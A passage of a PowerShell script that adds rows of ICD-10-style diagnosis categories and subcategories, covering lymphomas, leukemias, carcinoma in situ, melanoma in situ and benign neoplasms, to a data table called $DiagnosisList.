lymphoma") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Subcutaneous panniculitis-like T-cell lymphoma") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Blastic NK-cell lymphoma") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Angioimmunoblastic T-cell lymphoma") + $null = $DiagnosisList.Rows.Add("Other specified types of T/NK-cell lymphoma","Primary cutaneous CD30-positive T-cell proliferations") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Waldenstrom macroglobulinemia") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Heavy chain disease") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Immunoproliferative small intestinal disease") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Extranodal marginal zone B-cell lymphoma of mucosa-associated lymphoid tissue [MALT-lymphoma]") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Other malignant immunoproliferative diseases") + $null = $DiagnosisList.Rows.Add("Malignant immunoproliferative diseases and certain other B-cell lymphomas","Malignant immunoproliferative disease, unspecified") + $null = $DiagnosisList.Rows.Add("Multiple myeloma","Multiple myeloma not having achieved remission") + $null = $DiagnosisList.Rows.Add("Multiple myeloma","Multiple myeloma in remission") + $null = $DiagnosisList.Rows.Add("Multiple myeloma","Multiple myeloma in relapse") + $null = $DiagnosisList.Rows.Add("Plasma cell leukemia","Plasma cell leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Plasma cell leukemia","Plasma cell leukemia in remission") + $null = $DiagnosisList.Rows.Add("Plasma cell leukemia","Plasma cell leukemia in relapse") + $null = $DiagnosisList.Rows.Add("Extramedullary plasmacytoma","Extramedullary plasmacytoma not having achieved remission") + $null = $DiagnosisList.Rows.Add("Extramedullary plasmacytoma","Extramedullary plasmacytoma in remission") + $null = $DiagnosisList.Rows.Add("Extramedullary plasmacytoma","Extramedullary plasmacytoma in relapse") + $null = $DiagnosisList.Rows.Add("Solitary plasmacytoma","Solitary plasmacytoma not having achieved remission") + $null = $DiagnosisList.Rows.Add("Solitary plasmacytoma","Solitary plasmacytoma in remission") + $null = $DiagnosisList.Rows.Add("Solitary plasmacytoma","Solitary plasmacytoma in relapse") + $null = $DiagnosisList.Rows.Add("Acute lymphoblastic leukemia [ALL]","Acute lymphoblastic leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute lymphoblastic leukemia [ALL]","Acute lymphoblastic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute lymphoblastic leukemia [ALL]","Acute lymphoblastic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Chronic lymphocytic leukemia of B-cell type","Chronic lymphocytic leukemia of B-cell type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Chronic lymphocytic leukemia of B-cell type","Chronic lymphocytic leukemia of B-cell type in remission") + $null = $DiagnosisList.Rows.Add("Chronic lymphocytic leukemia of B-cell type","Chronic lymphocytic leukemia of B-cell type in relapse") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of B-cell type","Prolymphocytic leukemia of B-cell type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of B-cell type","Prolymphocytic leukemia of B-cell type, in remission") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of B-cell type","Prolymphocytic leukemia of B-cell type, in relapse") + $null = $DiagnosisList.Rows.Add("Hairy cell leukemia","Hairy cell leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Hairy cell leukemia","Hairy cell leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Hairy cell leukemia","Hairy cell leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Adult T-cell lymphoma/leukemia (HTLV-1-associated)","Adult T-cell lymphoma/leukemia (HTLV-1-associated) not having achieved remission") + $null = $DiagnosisList.Rows.Add("Adult T-cell lymphoma/leukemia (HTLV-1-associated)","Adult T-cell lymphoma/leukemia (HTLV-1-associated), in remission") + $null = $DiagnosisList.Rows.Add("Adult T-cell lymphoma/leukemia (HTLV-1-associated)","Adult T-cell lymphoma/leukemia (HTLV-1-associated), in relapse") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of T-cell type","Prolymphocytic leukemia of T-cell type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of T-cell type","Prolymphocytic leukemia of T-cell type, in remission") + $null = $DiagnosisList.Rows.Add("Prolymphocytic leukemia of T-cell type","Prolymphocytic leukemia of T-cell type, in relapse") + $null = $DiagnosisList.Rows.Add("Mature B-cell leukemia Burkitt-type","Mature B-cell leukemia Burkitt-type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Mature B-cell leukemia Burkitt-type","Mature B-cell leukemia Burkitt-type, in remission") + $null = $DiagnosisList.Rows.Add("Mature B-cell leukemia Burkitt-type","Mature B-cell leukemia Burkitt-type, in relapse") + $null = $DiagnosisList.Rows.Add("Other lymphoid leukemia","Other lymphoid leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Other lymphoid leukemia","Other lymphoid leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Other lymphoid leukemia","Other lymphoid leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Lymphoid leukemia, unspecified","Lymphoid leukemia, unspecified not having achieved remission") + $null = $DiagnosisList.Rows.Add("Lymphoid leukemia, unspecified","Lymphoid leukemia, unspecified, in remission") + $null = $DiagnosisList.Rows.Add("Lymphoid leukemia, unspecified","Lymphoid leukemia, unspecified, in relapse") + $null = $DiagnosisList.Rows.Add("Acute myeloblastic leukemia","Acute myeloblastic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute myeloblastic leukemia","Acute myeloblastic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute myeloblastic leukemia","Acute myeloblastic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Chronic myeloid leukemia, BCR/ABL-positive","Chronic myeloid leukemia, BCR/ABL-positive, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Chronic myeloid leukemia, BCR/ABL-positive","Chronic myeloid leukemia, BCR/ABL-positive, in remission") + $null = $DiagnosisList.Rows.Add("Chronic myeloid leukemia, BCR/ABL-positive","Chronic myeloid leukemia, BCR/ABL-positive, in relapse") + $null = $DiagnosisList.Rows.Add("Atypical chronic myeloid leukemia, BCR/ABL-negative","Atypical chronic myeloid leukemia, BCR/ABL-negative, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Atypical chronic myeloid leukemia, BCR/ABL-negative","Atypical chronic myeloid leukemia, BCR/ABL-negative, in remission") + $null = $DiagnosisList.Rows.Add("Atypical chronic myeloid leukemia, BCR/ABL-negative","Atypical chronic myeloid leukemia, BCR/ABL-negative, in relapse") + $null = $DiagnosisList.Rows.Add("Myeloid sarcoma","Myeloid sarcoma, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Myeloid sarcoma","Myeloid sarcoma, in remission") + $null = $DiagnosisList.Rows.Add("Myeloid sarcoma","Myeloid sarcoma, in relapse") + $null = $DiagnosisList.Rows.Add("Acute promyelocytic leukemia","Acute promyelocytic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute promyelocytic leukemia","Acute promyelocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute promyelocytic leukemia","Acute promyelocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Acute myelomonocytic leukemia","Acute myelomonocytic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute myelomonocytic leukemia","Acute myelomonocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute myelomonocytic leukemia","Acute myelomonocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with 11q23-abnormality","Acute myeloid leukemia with 11q23-abnormality not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with 11q23-abnormality","Acute myeloid leukemia with 11q23-abnormality in remission") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with 11q23-abnormality","Acute myeloid leukemia with 11q23-abnormality in relapse") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with multilineage dysplasia","Acute myeloid leukemia with multilineage dysplasia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with multilineage dysplasia","Acute myeloid leukemia with multilineage dysplasia, in remission") + $null = $DiagnosisList.Rows.Add("Acute myeloid leukemia with multilineage dysplasia","Acute myeloid leukemia with multilineage dysplasia, in relapse") + $null = $DiagnosisList.Rows.Add("Other myeloid leukemia","Other myeloid leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Other myeloid leukemia","Other myeloid leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Other myeloid leukemia","Other myeloid leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Myeloid leukemia, unspecified","Myeloid leukemia, unspecified, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Myeloid leukemia, unspecified","Myeloid leukemia, unspecified in remission") + $null = $DiagnosisList.Rows.Add("Myeloid leukemia, unspecified","Myeloid leukemia, unspecified in relapse") + $null = $DiagnosisList.Rows.Add("Acute monoblastic/monocytic leukemia","Acute monoblastic/monocytic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute monoblastic/monocytic leukemia","Acute monoblastic/monocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute monoblastic/monocytic leukemia","Acute monoblastic/monocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Chronic myelomonocytic leukemia","Chronic myelomonocytic leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Chronic myelomonocytic leukemia","Chronic myelomonocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Chronic myelomonocytic leukemia","Chronic myelomonocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Juvenile myelomonocytic leukemia","Juvenile myelomonocytic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Juvenile myelomonocytic leukemia","Juvenile myelomonocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Juvenile myelomonocytic leukemia","Juvenile myelomonocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Other monocytic leukemia","Other monocytic leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Other monocytic leukemia","Other monocytic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Other monocytic leukemia","Other monocytic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Monocytic leukemia, unspecified","Monocytic leukemia, unspecified, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Monocytic leukemia, unspecified","Monocytic leukemia, unspecified in remission") + $null = $DiagnosisList.Rows.Add("Monocytic leukemia, unspecified","Monocytic leukemia, unspecified in relapse") + $null = $DiagnosisList.Rows.Add("Acute erythroid leukemia","Acute erythroid leukemia, not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute erythroid leukemia","Acute erythroid leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute erythroid leukemia","Acute erythroid leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Acute megakaryoblastic leukemia","Acute megakaryoblastic leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute megakaryoblastic leukemia","Acute megakaryoblastic leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Acute megakaryoblastic leukemia","Acute megakaryoblastic leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Mast cell leukemia","Mast cell leukemia not having achieved remission") + $null = $DiagnosisList.Rows.Add("Mast cell leukemia","Mast cell leukemia, in remission") + $null = $DiagnosisList.Rows.Add("Mast cell leukemia","Mast cell leukemia, in relapse") + $null = $DiagnosisList.Rows.Add("Acute panmyelosis with myelofibrosis","Acute panmyelosis with myelofibrosis not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute panmyelosis with myelofibrosis","Acute panmyelosis with myelofibrosis, in remission") + $null = $DiagnosisList.Rows.Add("Acute panmyelosis with myelofibrosis","Acute panmyelosis with myelofibrosis, in relapse") + $null = $DiagnosisList.Rows.Add("Myelodysplastic disease, not classified","Myelodysplastic disease, not classified") + $null = $DiagnosisList.Rows.Add("Other specified leukemias","Other specified leukemias not having achieved remission") + $null = $DiagnosisList.Rows.Add("Other specified leukemias","Other specified leukemias, in remission") + $null = $DiagnosisList.Rows.Add("Other specified leukemias","Other specified leukemias, in relapse") + $null = $DiagnosisList.Rows.Add("Acute leukemia of unspecified cell type","Acute leukemia of unspecified cell type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Acute leukemia of unspecified cell type","Acute leukemia of unspecified cell type, in remission") + $null = $DiagnosisList.Rows.Add("Acute leukemia of unspecified cell type","Acute leukemia of unspecified cell type, in relapse") + $null = $DiagnosisList.Rows.Add("Chronic leukemia of unspecified cell type","Chronic leukemia of unspecified cell type not having achieved remission") + $null = $DiagnosisList.Rows.Add("Chronic leukemia of unspecified cell type","Chronic leukemia of unspecified cell type, in remission") + $null = $DiagnosisList.Rows.Add("Chronic leukemia of unspecified cell type","Chronic leukemia of unspecified cell type, in relapse") + $null = $DiagnosisList.Rows.Add("Leukemia, unspecified","Leukemia, unspecified not having achieved remission") + $null = $DiagnosisList.Rows.Add("Leukemia, unspecified","Leukemia, unspecified, in remission") + $null = $DiagnosisList.Rows.Add("Leukemia, unspecified","Leukemia, unspecified, in relapse") + $null = $DiagnosisList.Rows.Add("Other and unspecified malignant neoplasms of lymphoid, hematopoietic and related tissue","Multifocal and multisystemic (disseminated) Langerhans-cell histiocytosis") + $null = $DiagnosisList.Rows.Add("Malignant mast cell neoplasm","Malignant mast cell neoplasm, unspecified") + $null = $DiagnosisList.Rows.Add("Malignant mast cell neoplasm","Aggressive systemic mastocytosis") + $null = $DiagnosisList.Rows.Add("Malignant mast cell neoplasm","Mast cell sarcoma") + $null = $DiagnosisList.Rows.Add("Malignant mast cell neoplasm","Other malignant mast cell neoplasm") + $null = $DiagnosisList.Rows.Add("Sarcoma of dendritic cells (accessory cells)","Sarcoma of dendritic cells (accessory cells)") + $null = $DiagnosisList.Rows.Add("Multifocal and unisystemic Langerhans-cell histiocytosis","Multifocal and unisystemic Langerhans-cell histiocytosis") + $null = $DiagnosisList.Rows.Add("Unifocal Langerhans-cell histiocytosis","Unifocal Langerhans-cell histiocytosis") + $null = $DiagnosisList.Rows.Add("Histiocytic sarcoma","Histiocytic sarcoma") + $null = $DiagnosisList.Rows.Add("Other specified malignant neoplasms of lymphoid, hematopoietic and related tissue","Other specified malignant neoplasms of lymphoid, hematopoietic and related tissue") + $null = $DiagnosisList.Rows.Add("Malignant neoplasm of lymphoid, hematopoietic and related tissue, unspecified","Malignant neoplasm of lymphoid, hematopoietic and related tissue, unspecified") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of oral cavity, unspecified site") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of labial mucosa and vermilion border") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of buccal mucosa") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of gingiva and edentulous alveolar ridge") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of soft palate") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of hard palate") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of floor of mouth") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of tongue") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of lip, oral cavity and pharynx","Carcinoma in situ of pharynx") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of esophagus","Carcinoma in situ of esophagus") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of stomach","Carcinoma in situ of stomach") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified digestive organs","Carcinoma in situ of colon") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified digestive organs","Carcinoma in situ of rectosigmoid junction") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified digestive organs","Carcinoma in situ of rectum") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified digestive organs","Carcinoma in situ of anus and anal canal") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified parts of intestine","Carcinoma in situ of unspecified part of intestine") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified parts of intestine","Carcinoma in situ of other parts of intestine") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of liver, gallbladder and bile ducts","Carcinoma in situ of liver, gallbladder and bile ducts") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other specified digestive organs","Carcinoma in situ of other specified digestive organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of digestive organ, unspecified","Carcinoma in situ of digestive organ, unspecified") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of middle ear and respiratory system","Carcinoma in situ of larynx") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of middle ear and respiratory system","Carcinoma in situ of trachea") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of bronchus and lung","Carcinoma in situ of unspecified bronchus and lung") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of bronchus and lung","Carcinoma in situ of right bronchus and lung") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of bronchus and lung","Carcinoma in situ of left bronchus and lung") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other parts of respiratory system","Carcinoma in situ of other parts of respiratory system") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of respiratory system, unspecified","Carcinoma in situ of respiratory system, unspecified") + $null = $DiagnosisList.Rows.Add("Melanoma in situ","Melanoma in situ of lip") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of eyelid, including canthus","Melanoma in situ of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of eyelid, including canthus","Melanoma in situ of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of eyelid, including canthus","Melanoma in situ of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of ear and external auricular canal","Melanoma in situ of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of ear and external auricular canal","Melanoma in situ of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of ear and external auricular canal","Melanoma in situ of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of other and unspecified parts of face","Melanoma in situ of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of other and unspecified parts of face","Melanoma in situ of other parts of face") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of scalp and neck","Melanoma in situ of scalp and neck") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of trunk","Melanoma in situ of anal skin") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of trunk","Melanoma in situ of breast (skin) (soft tissue)") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of trunk","Melanoma in situ of other part of trunk") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of upper limb, including shoulder","Melanoma in situ of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of upper limb, including shoulder","Melanoma in situ of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of upper limb, including shoulder","Melanoma in situ of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of lower limb, including hip","Melanoma in situ of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of lower limb, including hip","Melanoma in situ of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of lower limb, including hip","Melanoma in situ of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Melanoma in situ of other sites","Melanoma in situ of other sites") + $null = $DiagnosisList.Rows.Add("Melanoma in situ, unspecified","Melanoma in situ, unspecified") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin","Carcinoma in situ of skin of lip") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of eyelid, including canthus","Carcinoma in situ of skin of unspecified eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of eyelid, including canthus","Carcinoma in situ of skin of right eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of eyelid, including canthus","Carcinoma in situ of skin of left eyelid, including canthus") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of ear and external auricular canal","Carcinoma in situ of skin of unspecified ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of ear and external auricular canal","Carcinoma in situ of skin of right ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of ear and external auricular canal","Carcinoma in situ of skin of left ear and external auricular canal") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of other and unspecified parts of face","Carcinoma in situ of skin of unspecified part of face") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of other and unspecified parts of face","Carcinoma in situ of skin of other parts of face") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of scalp and neck","Carcinoma in situ of skin of scalp and neck") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of trunk","Carcinoma in situ of skin of trunk") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of upper limb, including shoulder","Carcinoma in situ of skin of unspecified upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of upper limb, including shoulder","Carcinoma in situ of skin of right upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of upper limb, including shoulder","Carcinoma in situ of skin of left upper limb, including shoulder") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of lower limb, including hip","Carcinoma in situ of skin of unspecified lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of lower limb, including hip","Carcinoma in situ of skin of right lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of lower limb, including hip","Carcinoma in situ of skin of left lower limb, including hip") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin of other sites","Carcinoma in situ of skin of other sites") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of skin, unspecified","Carcinoma in situ of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Lobular carcinoma in situ of breast","Lobular carcinoma in situ of unspecified breast") + $null = $DiagnosisList.Rows.Add("Lobular carcinoma in situ of breast","Lobular carcinoma in situ of right breast") + $null = $DiagnosisList.Rows.Add("Lobular carcinoma in situ of breast","Lobular carcinoma in situ of left breast") + $null = $DiagnosisList.Rows.Add("Intraductal carcinoma in situ of breast","Intraductal carcinoma in situ of unspecified breast") + $null = $DiagnosisList.Rows.Add("Intraductal carcinoma in situ of breast","Intraductal carcinoma in situ of right breast") + $null = $DiagnosisList.Rows.Add("Intraductal carcinoma in situ of breast","Intraductal carcinoma in situ of left breast") + $null = $DiagnosisList.Rows.Add("Other specified type of carcinoma in situ of breast","Other specified type of carcinoma in situ of unspecified breast") + $null = $DiagnosisList.Rows.Add("Other specified type of carcinoma in situ of breast","Other specified type of carcinoma in situ of right breast") + $null = $DiagnosisList.Rows.Add("Other specified type of carcinoma in situ of breast","Other specified type of carcinoma in situ of left breast") + $null = $DiagnosisList.Rows.Add("Unspecified type of carcinoma in situ of breast","Unspecified type of carcinoma in situ of unspecified breast") + $null = $DiagnosisList.Rows.Add("Unspecified type of carcinoma in situ of breast","Unspecified type of carcinoma in situ of right breast") + $null = $DiagnosisList.Rows.Add("Unspecified type of carcinoma in situ of breast","Unspecified type of carcinoma in situ of left breast") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of cervix uteri","Carcinoma in situ of endocervix") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of cervix uteri","Carcinoma in situ of exocervix") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of cervix uteri","Carcinoma in situ of other parts of cervix") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of cervix uteri","Carcinoma in situ of cervix, unspecified") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified genital organs","Carcinoma in situ of endometrium") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified genital organs","Carcinoma in situ of vulva") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified genital organs","Carcinoma in situ of vagina") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified female genital organs","Carcinoma in situ of unspecified female genital organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified female genital organs","Carcinoma in situ of other female genital organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of penis","Carcinoma in situ of penis") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of prostate","Carcinoma in situ of prostate") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified male genital organs","Carcinoma in situ of unspecified male genital organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified male genital organs","Carcinoma in situ of scrotum") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified male genital organs","Carcinoma in situ of other male genital organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified sites","Carcinoma in situ of bladder") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified urinary organs","Carcinoma in situ of unspecified urinary organ") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other and unspecified urinary organs","Carcinoma in situ of other urinary organs") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of eye","Carcinoma in situ of unspecified eye") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of eye","Carcinoma in situ of right eye") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of eye","Carcinoma in situ of left eye") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of thyroid and other endocrine glands","Carcinoma in situ of thyroid and other endocrine glands") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ of other specified sites","Carcinoma in situ of other specified sites") + $null = $DiagnosisList.Rows.Add("Carcinoma in situ, unspecified","Carcinoma in situ, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mouth and pharynx","Benign neoplasm of lip") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mouth and pharynx","Benign neoplasm of tongue") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of mouth and pharynx","Benign neoplasm of floor of mouth") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified parts of mouth","Benign neoplasm of unspecified part of mouth") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified parts of mouth","Benign neoplasm of other parts of mouth") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of tonsil","Benign neoplasm of tonsil") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other parts of oropharynx","Benign neoplasm of other parts of oropharynx") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of nasopharynx","Benign neoplasm of nasopharynx") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of hypopharynx","Benign neoplasm of hypopharynx") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of pharynx, unspecified","Benign neoplasm of pharynx, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of major salivary glands","Benign neoplasm of parotid gland") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of major salivary glands","Benign neoplasm of other major salivary glands") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of major salivary glands","Benign neoplasm of major salivary gland, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of cecum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of appendix") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of ascending colon") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of transverse colon") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of descending colon") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of sigmoid colon") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of colon, unspecified") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of rectosigmoid junction") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of rectum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of colon, rectum, anus and anal canal","Benign neoplasm of anus and anal canal") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and ill-defined parts of digestive system","Benign neoplasm of esophagus") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and ill-defined parts of digestive system","Benign neoplasm of stomach") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and ill-defined parts of digestive system","Benign neoplasm of duodenum") + $null = $DiagnosisList.Rows.Add("Benign neoplasm of other and unspecified parts 